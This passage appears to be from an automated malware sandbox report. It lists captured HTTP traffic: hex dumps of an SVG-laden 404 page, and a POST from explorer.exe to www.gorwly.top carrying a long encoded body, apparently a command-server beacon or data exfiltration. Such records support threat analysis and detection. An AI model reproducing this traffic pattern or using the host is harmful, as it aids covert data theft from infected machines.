20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 6f 70 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 73 74 6f 70 36 30 39 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 6f 66 66 73 65 74 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61
                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/css/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" style="stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="transla
                                                                                                                      Mar 20, 2023 09:09:48.929101944 CET227INData Raw: 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: te(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:
                                                                                                                      Mar 20, 2023 09:09:48.929126024 CET228INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33
                                                                                                                      Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.
                                                                                                                      Mar 20, 2023 09:09:48.929146051 CET229INData Raw: 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f
                                                                                                                      Data Ascii: ke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13
                                                                                                                      Mar 20, 2023 09:09:48.929164886 CET231INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69
                                                                                                                      Data Ascii: lay:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.1
                                                                                                                      Mar 20, 2023 09:09:48.929183960 CET232INData Raw: 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33
                                                                                                                      Data Ascii: 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.
                                                                                                                      Mar 20, 2023 09:09:48.929202080 CET233INData Raw: 30 37 33 38 20 30 2e 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69
                                                                                                                      Data Ascii: 0738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545"
                                                                                                                      Mar 20, 2023 09:09:48.929219961 CET235INData Raw: 64 3d 22 70 61 74 68 34 35 35 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30
                                                                                                                      Data Ascii: d="path4556" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.
                                                                                                                      Mar 20, 2023 09:09:48.929239988 CET236INData Raw: 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                                                      Data Ascii: 9.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <el
                                                                                                                      Mar 20, 2023 09:09:48.929260969 CET237INData Raw: 33 2e 32 36 31 32 31 20 36 2e 36 31 37 30 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a
                                                                                                                      Data Ascii: 3.26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform
                                                                                                                      Mar 20, 2023 09:09:49.104393959 CET239INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <path transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.1


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      17192.168.2.349716192.64.116.16280C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:51.350832939 CET247OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.gorwly.top
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.gorwly.top
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.gorwly.top/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 6d 4a 49 72 47 4b 30 6b 4a 36 58 6e 45 58 4e 58 49 4f 65 71 36 6c 43 58 67 4d 4c 67 39 77 45 52 47 65 6c 2d 68 77 65 42 78 32 61 58 4f 68 71 69 38 53 48 45 46 2d 4f 44 58 45 51 41 33 4c 56 78 4e 45 28 41 4f 35 32 71 41 68 4f 4d 6b 46 34 66 43 69 69 70 6d 77 58 7a 42 34 44 38 48 51 36 31 48 63 67 4b 67 4a 55 5f 62 6f 28 35 6f 47 5a 4d 58 37 78 64 49 5a 51 37 58 4a 47 68 70 6d 69 36 76 4f 72 43 43 52 4f 70 49 52 58 4d 4d 61 50 64 4e 36 54 33 4c 54 55 4b 58 52 4d 43 4d 48 4c 6c 64 6b 4c 36 42 4d 63 34 28 70 76 31 6e 48 71 58 73 49 6e 37 68 77 30 38 6e 70 4e 30 51 2d 6d 35 78 55 78 68 42 38 6b 43 65 4b 4e 65 35 58 41 67 46 5f 4c 4d 32 53 58 35 64 6e 74 6e 6e 77 39 32 37 47 57 36 36 53 34 65 50 75 76 71 41 36 46 52 63 7a 51 59 6d 30 36 54 6c 4a 28 56 28 4d 36 52 47 55 78 78 36 55 52 6e 68 59 57 62 41 39 52 34 72 69 77 46 47 47 53 59 58 7a 44 5f 63 37 56 4b 51 4c 72 68 44 38 75 37 69 31 72 2d 59 4c 57 2d 72 47 75 41 4b 51 63 2d 55 45 69 69 67 54 6b 33 5a 58 76 73 47 44 71 32 6d 38 72 64 77 6f 32 49 32 51 6b 61 6c 62 45 4e 43 36 7e 54 57 52 71 43 34 69 38 4b 65 79 6a 64 75 69 28 37 6f 59 43 74 35 63 4d 77 57 4a 39 56 31 6f 35 4e 52 41 38 45 44 45 74 68 72 51 56 4b 45 51 46 74 31 69 79 41 38 66 67 41 33 78 7a 48 6c 53 7a 53 34 67 72 77 4a 68 32 79 57 6e 62 54 53 33 49 63 41 6d 66 64 44 67 33 42 74 6c 4a 38 36 4e 6c 45 66 77 6d 79 37 6f 51 31 52 55 32 48 39 53 4c 79 70 76 4f 6d 4b 38 38 38 58 5f 41 77 35 63 39 7a 79 73 6e 6a 35 6a 45 6f 6a 54 30 42 30 47 66 50 62 65 7a 68 55 78 4d 75 72 75 78 75 69 35 50 6a 4e 53 6a 59 7e 65 6e 6e 44 79 37 69 64 31 63 43 59 41 4d 61 6d 64 5a 55 70 5f 49 46 74 66 79 74 53 59 66 62 4f 4b 72 76 4d 35 50 30 35 62 45 6a 63 4e 36 41 63 33 35 63 69 5a 72 38 54 57 28 65 5a 4b 4a 6f 68 59 48 31 38 4a 4e 70 67 30 7e 55 68 4a 48 44 43 73 79 47 6f 42 5a 65 33 4f 63 34 42 68 4e 79 6f 52 7a 45 53 50 71 6d 35 38 35 58 47 79 35 56 68 59 34 64 4a 46 4c 79 4c 55 6a 77 7e 51 6e 77 36 47 6e 52 41 4c 37 61 77 54 62 5f 69 38 45 35 79 6d 54 57 79 49 78 64 39 67 33 62 61 51 30 52 72 6c 4c 6b 61 5a 42 50 31 4c 68 35 30 78 42 4f 71 32 42 37 28 39 78 32 73 75 76 75 65 39 6f 68 62 37 68 6c 6f 73 4b 51 79 52 4a 45 51 43 43 4f 28 4d 48 36 43 76 66 74 71 48 79 56 7a 37 78 6f 52 77 28 70 36 52 68 2d 54 68 52 62 78 54 71 36 56 64 33 49 71 36 73 50 53 77 4b 50 43 5a 7e 70 4e 75 7a 67 38 77 43 77 71 53 63 5a 4a 70 47 38 6b 5a 37 6f 73 69 33 73 4b 56 6d 79 43 43 55 5a 4c 72 33 69 50 41 50 49 62 42 70 33 32 75 55 74 59 4a 38 39 79 51 71 6a 56 39 68 2d 6c 4b 63 45 7a 74 47 53 50 37 38 78 45 55 46 53 4c 6d 57 5a 64 5a 54 5a 72 36 4b 43 32 2d 4c 6e 39 61 50 67 7a 4f 43 73 6e 49 64 54 75 47 51 51 4d 44 67 73 47 72 64 75 68 36 4a 5f 4d 6b 4a 6b 7e 6b 6a 6f 37 35 4a 41 68 4b 67 2d 6f 50 41 38 57 6e 57 6e 64 34 47 6d 55 42 69 32 4b 5f 57 78 6b 53 33 75 7e 4d 4a 59 47 6f 6d 2d 75 75 42 47 31 34 28 44 7a 66 48 6a 4e 53 4f 66 37 50 33 58 56 6a 44 63 61 58 6c 33 31 6c 28 36 32 5a 71 32 58 30 46 6b 4f 59 37 6f 43 6b 62 45 43 5a 39 4d 73 73 5a 39 6c 47 35 35 35 6e 4f 67 36 68 6f 6b 50 41 45 45 52 63 37 4b 35 7a 4c 30 50 62 77 31 71 33 79 4d 4d 67 76 64 71 4d 74 43 6e 37 53 58 75 6b 62 35 7a 64 63 46 64 76 34 4b 35 5f 72 68 76 55 78 35 45 75 70 4b 54 79 61 4b 75 66 32 47 67 65 53 72 34 6e 49 37 65 4d 6e 5a 67 78 36 42 72 62 7e 67 50 33 70 77 59 59 69 4b 54 65 50 38 31 54 41 74 57 35 57 34 67 78 31 52 34 72 44 68 37 43 78 7a 55 67 57 46 61 56 48 54 55 38 61 32 59 7a 51 36 4a 66 68 45 70 30 58 55 69 41 71 79 6b 47 4e 6a 64 61 75 53 39 44 46 6d 66 57 7e 76 7e 30 52 43 33 2d 55 70 49 59 42 6e 75 46 56 30 68 68 56 69 33 5f 77 58 72 63 66 32 50 73 62 67 46 65 6b 57 6d 69 35 65 72 32 59 45 75 65 32 67 70 6b 34 46 73 69 42 57 54 6c 79 72 76 32 54 6e 4b 65 52 77 39 70 52 78 4f 52 30 4c 69 74 38 77 41 72 65 61 65 4a 54 64 46 35 50 75 36 6b 73 56 64 51 69 51 31 4d 4e 51 47 6f 45 63 69 6e 41 70 53 7a 6d 71 50 72 6e 44 4f 31 61 51 6e 31 6f 4e 57 50 4e 2d 6b 53 62 41 6e 31 4d 5a 6e 6e 46 4f 31 35 67 57 7e 44 78 5a 54 47 54 62 69 53 56 4d 64 76 6b 46 53 37 52 37 43 61 38 39 51 52 58 72 7e 6d 77 78 54 4f 65 4c 70 34 49 79 28 49 58
                                                                                                                      Data Ascii: ICHyvj5=mJIrGK0kJ6XnEXNXIOeq6lCXgMLg9wERGel-hweBx2aXOhqi8SHEF-ODXEQA3LVxNE(AO52qAhOMkF4fCiipmwXzB4D8HQ61HcgKgJU_bo(5oGZMX7xdIZQ7XJGhpmi6vOrCCROpIRXMMaPdN6T3LTUKXRMCMHLldkL6BMc4(pv1nHqXsIn7hw08npN0Q-m5xUxhB8kCeKNe5XAgF_LM2SX5dntnnw927GW66S4ePuvqA6FRczQYm06TlJ(V(M6RGUxx6URnhYWbA9R4riwFGGSYXzD_c7VKQLrhD8u7i1r-YLW-rGuAKQc-UEiigTk3ZXvsGDq2m8rdwo2I2QkalbENC6~TWRqC4i8Keyjdui(7oYCt5cMwWJ9V1o5NRA8EDEthrQVKEQFt1iyA8fgA3xzHlSzS4grwJh2yWnbTS3IcAmfdDg3BtlJ86NlEfwmy7oQ1RU2H9SLypvOmK888X_Aw5c9zysnj5jEojT0B0GfPbezhUxMuruxui5PjNSjY~ennDy7id1cCYAMamdZUp_IFtfytSYfbOKrvM5P05bEjcN6Ac35ciZr8TW(eZKJohYH18JNpg0~UhJHDCsyGoBZe3Oc4BhNyoRzESPqm585XGy5VhY4dJFLyLUjw~Qnw6GnRAL7awTb_i8E5ymTWyIxd9g3baQ0RrlLkaZBP1Lh50xBOq2B7(9x2suvue9ohb7hlosKQyRJEQCCO(MH6CvftqHyVz7xoRw(p6Rh-ThRbxTq6Vd3Iq6sPSwKPCZ~pNuzg8wCwqScZJpG8kZ7osi3sKVmyCCUZLr3iPAPIbBp32uUtYJ89yQqjV9h-lKcEztGSP78xEUFSLmWZdZTZr6KC2-Ln9aPgzOCsnIdTuGQQMDgsGrduh6J_MkJk~kjo75JAhKg-oPA8WnWnd4GmUBi2K_WxkS3u~MJYGom-uuBG14(DzfHjNSOf7P3XVjDcaXl31l(62Zq2X0FkOY7oCkbECZ9MssZ9lG555nOg6hokPAEERc7K5zL0Pbw1q3yMMgvdqMtCn7SXukb5zdcFdv4K5_rhvUx5EupKTyaKuf2GgeSr4nI7eMnZgx6Brb~gP3pwYYiKTeP81TAtW5W4gx1R4rDh7CxzUgWFaVHTU8a2YzQ6JfhEp0XUiAqykGNjdauS9DFmfW~v~0RC3-UpIYBnuFV0hhVi3_wXrcf2PsbgFekWmi5er2YEue2gpk4FsiBWTlyrv2TnKeRw9pRxOR0Lit8wAreaeJTdF5Pu6ksVdQiQ1MNQGoEcinApSzmqPrnDO1aQn1oNWPN-kSbAn1MZnnFO15gW~DxZTGTbiSVMdvkFS7R7Ca89QRXr~mwxTOeLp4Iy(IXlAEsEveq1bsETy9UEah3JQKv76GoDyaYXY2Nc9FgyTSw3qnG3QjATDMRzgKDhEdVZ~uATvWmmqqak4AEd8nVmRGxMlIvG6LJ1UPo5BY63d-RnyI1aEGhQw1pxZi2mpSnJ(E1l8thFZKU5O5DiK_mzvuznDrWoOFjOvmOIF2bATdFlI2R0W8C05VOQx-H63cy9hmmK1wgd7POYiTXZJv29XQtjBmTnHaSe51tP1ng1m8~RWKEZFer_8XBQquhcMwMMxW5LsxPWiy2GH_OIGGD3dS5sBWwO~UEEA0f672b8GhkPk2HGUbU2tHR6039BmLZLDq41Hk9i5Bl-tsYFsuO4kmC3qCTY1D8KU0EbKSXTY7sQvkExt1(O8_~k1nK52HOAtgKzDqjH(UuocCSO1TWF0FYq~vAer_gz3ZNkBMwJTG58GOuC7QUII58BMfYjW6(yqvBirDgYJmFqXaehHCbE8WhxZWux0pV28J~ShJ1PzvY3VXazpTLP71yz8vNknbYkiV9CkmeKGiqveJh-hnE3kBaABhKeJd5Ew4dwIDJ2ZXagPs3PFTKhjGUtJCYzSW7XBQYWSwi2QPO5Z1abJjsGMnhP~Y1B3wWYQPDHWwixlQxlRq30JCbdwUvjTRWzMn5kumONU-bkyeo2YLl6bF5R0zbG07g1zmEv7OjC2GJblc8kot3LuZAMkxS5(Ny8yI7BW7l_JO331TqXeUDXOfQ1lnKapYXeoxk_sD6aChIVKuXLYwx0szmSrJeCmTyo7BkVccv6ReopE9ub6Nn1cC0JBEyXXZDRMoF8YkVBeaxZ8I1m24DkFMQJVBp7COYUvj4rjU(fGWpp09~mhs43uQ7RbOMrh6ijaJTmyle8dfXwMEtRhNogcRQI(WJfMxOJ2KDgmJgePMK9mXwnZpJhBDQmy_a_bUQuWB4jbLsZGDLfTXXcbXsv4PiTZzgrS9xG86YYon~xdry3RNVxpgQbEhqNzCdRgp9n2xhDQGZXfs8zP6ztvk5Sqhi9hkspRUyLcZ1qH1X0kB41YiTBFgk8wATilmRUQFr5IVT_(rmP4LOAtF5GbEQja7Ov(VfHElG2bDL0YxgIxELxXw~SAkAvtGlS1H9ya_cir8JSDW6vRNK0PBNHtTnMVxWixSRZVuWfotaRFY(HOyd2yWLqM9A2e16judVuxDoPAJSwCSwqEQcMbA7YkDNo4DP7RDS8avJ-gxm3(8c-Ag4wUwjzZV~imRaddBSCSHRB6BLQCpcDxJ9F1oQhsKJwAHHAOrskylkKpKvzSH9oAJNe8ojahs0RrZCm4reN9cRqyeyVI_SSdnoQsN3abNs7VsCoVOOWnNMHolv5okJEK3kZ5epraEXvh6K-ypNM3YwkpJ(cLXdrUL8r~_JZICoodg3G5kvImI6-XCkKvuPoXU3YZy8Qtn2hgNtGR6gkmATHsPawe4IsSfoB8Mv8qvcP8MXZBUMV2N0VT2cTfuMQGsmzL2lbmwF_JF3JwDXdLbf_(or71hN757jrj3TrKSFSxSYJdn89Kgy3rXFnmgJ_fPQQpLAUwJpUmQANHothOrggA8KLpvoffDBqXIJOoFLEMGTJSrw85aZmpq(CoGwTUste2uUO8A4zFwbgsqV9twfjYD(QmgW5USRBm0USzQMkG6Z8conQEfE3I8GcYvED9MAwBRdS8Fm9Ut1b9vud6I05TLzyP_UIXokMpf7bQuTNJe~ZZpF7eTllLQuZ2azeGul2pUpZmSaCvBNPcRuxDvxinbiqtIOrRCDvLYXSnhMsNX9HgQxHvORxckqam2SUE-bFFn(8xJddeLRyIvswyAkHgLyjQ4izGD06POeSnTi-aGqIR11-P9jZTaLxGVts0Sa_L716kWAOy5Gc9h8F8_1R2yZ7FDfbefhWIVQLM_CvpmnxA50E0wDCSM(gaan1WAR7~u~dC-Z_WR(BrGZzC1dR0XwzAQzBOyQmg12FSB05x8giv2VS5-N_hcW-R3CI4Ut4vwZNuCqhsn4hHgieSScBFgGUBwXuBPUjzAWw6YLy4GCEBmRQmDBXuxYTIUi83OXBrmUi(G0K3vc2CpZV3woNUrgZxEB7(zo7u-yqdNn80arNN-avVfVjh7DvMhPx2XlXNm~J89REBgXhkQq0obR_T_wdhnMEBZzyi8RsQvNJmEIpl_i7l93XZT~RnJ~nb-Iu7bGYCk78gygr8IZB0Dqi2Zbeud(JmSyihPQSv8V_qjnU2MQFxwiA1JgwazKjohGu1fggAHFauLn0qJgKYUeb3QjC5T6XMFdhHZk_1_u_BCBaFatXzxWpvNDm2jB3qNFO~r4Bix4FtVf9abkf7WQcuWe0jp9LgR~0QdaHFSt2bmZt0AwAwrqmHsJY82VSoEwTYYrdMqwRiIvZlbScHA6x(El2LcNdP9R6BMonVA0-zByBdy6-smtDdL1uiA(DW2EhtI3gC4NdfVCTlZehE6NFakki7Bjbu8zznxaComJPvyoZOv5c28DdqKZ8(uTrsdQhfoHAX44Pw3dYPZ~RhNE7x3HtZ2cJMOwn0gdKxyv1obgwVINRaakQFP7MuQ4tbV8-nKrq3PUYPRx4x-fyw2mbgwQl1d9RI1xSdnItMR9dSa4ZcZvp9IaLb5jtDWV2ma8eUKr5kuBhZTMO2YL1~cSu4j9_RzzH4jepxvH-pQjT(ovNZGc3Koqj7Ge57Er8vPoVaszwM4LtKqb64-atFF24~48hEW
                                                                                                                      Mar 20, 2023 09:09:51.639333010 CET248INHTTP/1.1 404 Not Found
                                                                                                                      Date: Mon, 20 Mar 2023 08:09:51 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 16056
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 6f 70 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 73 74 6f 70 36 30 39 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 6f 66 66 73 65 74 3d 22 